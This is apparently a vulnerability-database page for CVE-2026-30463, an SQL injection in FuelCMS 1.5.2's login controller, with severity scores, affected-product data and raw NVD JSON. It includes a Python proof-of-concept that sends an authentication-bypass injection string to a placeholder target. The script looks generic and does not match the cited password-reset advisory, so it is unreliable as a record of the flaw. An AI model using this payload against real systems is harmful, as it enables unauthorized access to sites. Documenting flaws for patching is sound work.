Security Vulnerability Report
中文
CVE-2026-30463 CVSS 7.7 HIGH

CVE-2026-30463

Published: 2026-03-26 19:17:00
Last Modified: 2026-03-30 14:14:29

Description

Daylight Studio FuelCMS v1.5.2 was discovered to contain a SQL injection vulnerability via the /controllers/Login.php component.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:* - VULNERABLE
Daylight Studio FuelCMS 1.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (replace with actual target) target_url = "http://target-ip/fuel/controllers/Login.php" # Payload demonstrating the SQL injection vulnerability # This payload attempts to bypass authentication or extract data payload = { "user_name": "admin' OR '1'='1'--", "password": "random" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=payload, headers=headers, timeout=10) # Check if the response indicates a successful login or database error if response.status_code == 200: if "Dashboard" in response.text or "Welcome" in response.text: print("[+] SQL Injection successful! Authentication bypassed.") elif "syntax error" in response.text or "mysql" in response.text.lower(): print("[+] Database error detected. Potential SQL Injection point found.") else: print("[-] Exploit sent, but exploitation status unclear.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30463", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:00.183", "lastModified": "2026-03-30T14:14:29.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Daylight Studio FuelCMS v1.5.2 was discovered to contain a SQL injection vulnerability via the /controllers/Login.php component."}, {"lang": "es", "value": "Daylight Studio FuelCMS v1.5.2 se descubrió que contenía una vulnerabilidad de inyección SQL a través del componente /controllers/Login.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "E3A44312-83D2-4421-9A35-3FD048EA578A"}]}]}], "references": [{"url": "http://daylight.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://fuelcms.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pentest-tools.com/PTT-2025-030%E2%80%93SQL-Injection-via-Password-Reset.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}